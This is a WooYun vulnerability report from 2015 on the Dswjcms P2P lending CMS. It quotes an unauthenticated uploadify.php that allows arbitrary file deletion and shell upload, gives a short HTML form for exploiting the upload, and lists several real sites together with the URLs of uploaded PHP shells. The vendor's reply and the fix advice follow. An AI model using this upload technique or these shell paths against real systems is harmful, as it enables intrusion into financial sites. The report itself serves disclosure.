当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141209

漏洞标题:某P2P网贷系统前台getshell与任意文件删除漏洞(可涉及大量资金安全)

相关厂商:dswjcms.com

漏洞作者: roker

提交时间:2015-09-17 12:33

修复时间:2015-12-16 19:54

公开时间:2015-12-16 19:54

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-11-11: 细节向核心白帽子及相关领域专家公开
2015-11-21: 细节向普通白帽子公开
2015-12-01: 细节向实习白帽子公开
2015-12-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

Boom~

详细说明:

/www/Public/uploadify/uploadify.php

<?php
/*
uploadify 后台处理
*/
//设置上传目录
error_reporting( E_ALL & ~E_NOTICE & ~E_DEPRECATED );
$path = "uploads/".$_GET['folder']."/";	
if($_GET['file_delete']){	//如果原先有图片就删除	
	if(file_exists('.'.$_GET['file_delete'])){	//存在图片
		unlink('.'.$_GET['file_delete']);	//删除它
	}
}
if (!empty($_FILES)) {
	
	//得到上传的临时文件流
	$tempFile = $_FILES['Filedata']['tmp_name'];
	
	//允许的文件后缀
	$fileTypes = array('jpg','jpeg','gif','png'); 
	
	//得到文件原名
	$fileParts = pathinfo($_FILES['Filedata']['name']);
	$ftype=$fileParts['extension'];
	$fileName=microtime(true).".".$fileParts['extension'];	//以微秒时间命名
	
	//最后保存服务器地址
	if(!is_dir($path))
	   mkdir($path);
	if (move_uploaded_file($tempFile, $path.$fileName)){
		echo $fileName;
	}else{
		echo $fileName.$_FILES['Filedata']['tmp_name']."上传失败!";
	}
}
?>


没有权限设置 ,$fileTypes也没有看到调用。
提交$_GET['file_delete'] 即可任意文件删除。
本地构造表单 

<form action="http://xxx/Public/uploadify/uploadify.php" method="post" enctype ="multipart/form-data" > 
<input id="File" name="Filedata" type="file" /> 
<input type="submit" name="Button1" value="Button" id="Button1" />
</form>


即可getshell。

漏洞证明:

案例 1:
http://www.pjzx123.com/

11.png


13亿。。不知道真的假的。。拒绝查水表- -
http://www.pjzx123.com/Public/uploadify/uploads/201509/1442254529.7142.php
案例2:
http://hm.bjdjyx.com/

33.png


几百万。
http://hm.bjdjyx.com//Public/uploadify/uploads/1442254710.5383.php
案例3:
http://www.yunzew.com/

22.png


10多万。
http://www.yunzew.com//Public/uploadify/uploads/1442254745.36.php
4:
http://www.aft-sunnyit.com//Public/uploadify/uploads/1442254784.43.php
5:
http://www.fangdaibao.cc/Public/uploadify/uploads/1442254831.3598.php

修复方案:

判断权限。检测后缀

版权声明:转载请注明来源 roker@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-09-17 19:52

厂商回复:

感谢您对Dswjcms的支持,以上几个站点都未购买过本公司的授权,请自行通知对应公司

最新状态:

2015-09-17:漏洞已修复感谢楼主对本开源系统的漏洞挖掘,我们在收到楼主的第一时间内已对反应的漏洞进行了修复,漏洞已通过Dswjcms官方论坛给予修复意见,并在下一版本对该漏洞进行修复;已购买授权的用户,我们将以邮件形式通知其自行修复,未购买授权的用户,请看到后去官方论坛查看修复方式后自行修复最后感谢乌云和作者为Dswjcms开源项目付出的贡献